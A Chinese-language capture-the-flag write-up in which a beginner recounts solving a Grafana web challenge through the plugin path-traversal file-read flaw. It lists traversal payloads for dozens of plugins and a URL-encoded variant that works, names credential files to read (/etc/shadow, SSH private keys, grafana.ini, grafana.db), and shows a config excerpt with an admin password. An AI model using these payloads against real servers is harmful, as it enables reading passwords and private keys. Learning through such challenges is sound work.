这也算是我第一个在正规比赛里写出来的web题了,激动的心情溢于言表,通过写这个题我也学到了很多新知识,当然也少不了队友的帮助,以后还要更加努力~~~
根据题目知道这是一道grafana框架题,身为萌新做题之前根本就没听说过,百度查看了一下官方的文档介绍grafana官方文档(好了压根看不进去),默认用户名和密码都是admin,我想怎么可能那么轻易让你登录上去,试了一下果然不对。又去搜grafana存在的漏洞点,果然让我找到了,grafana存在任意文件读取漏洞,原理就不细说了,就是利用grafana已经安装的插件来构造payload:
/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../../../../etc/passwd
刚开始一看这不就直接用?然后我就试了好几个poc,总也没反应,burpsuite上跑也是这样,瞬间整个人都不好了就想放弃。好在我有个好队友,原来这个斜杠线需要url编码一下,于是poc为
/public/plugins/text/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
发现回显
到这又卡住了,去哪个文件找密码呢?没办法只好继续查资料,发现能够读取到的文件有
/conf/defaults.ini
/etc/grafana/grafana.ini
/etc/passwd
/etc/shadow
/home/grafana/.bash_history
/home/grafana/.ssh/id_rsa
/root/.bash_history
/root/.ssh/id_rsa
/usr/local/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/net/fib_trie
/proc/net/tcp
/proc/self/cmdline
没办法,一个个试看哪个有用。在这里用
/public/plugins/text/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/grafana/grafana.ini
里面能够找到密码,不过我要特别提一下
/public/plugins/text/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/lib/grafana/grafana.db
这个能够获得一个数据库文件,在kali虚拟机中打开能够看到用户名和加密后的密码
我一度天真地以为是base64编码的,知道我看着解码后的一串乱码开始怀疑人生,百度确认了一下雀氏不是人能解密出来真正的密码后只能换别的看了。
回到开始,在grafana.ini文件中我们获得了密码,成功进入了grafana内部(这里说得轻巧,光为了找这个密码就花费了我一下午的时间,曾经我离密码只有一步之遥,然后我对着一长串的密码错认为它是加密后的,搞得我还以为这个密码是跟db文件里的密码一样是难以解密的)
#################################### Security ####################################
[security]
# disable creation of admin user on first start of grafana
;disable_initial_admin_creation = false
# default admin user, created on startup
admin_user = admin
# default admin password, can be changed before first start of grafana, or in profile settings
admin_password = 5f989714e132c9b04d4807dafeb10ade
# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm
...
进入到grafana后我又迷茫了,这要我去哪找flag啊?在学长的提点下,我知道了原来需要通过连接数据库来获取flag,
配置数据源,选mysql(别的好像也行),在探索里输入sql查询命令:
show databases;
show tables;
select * from fffffllllllllaaaaaaaggggg;
然后就获得flag了。耗时13个小时,继续努力。
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至1004454362@qq.com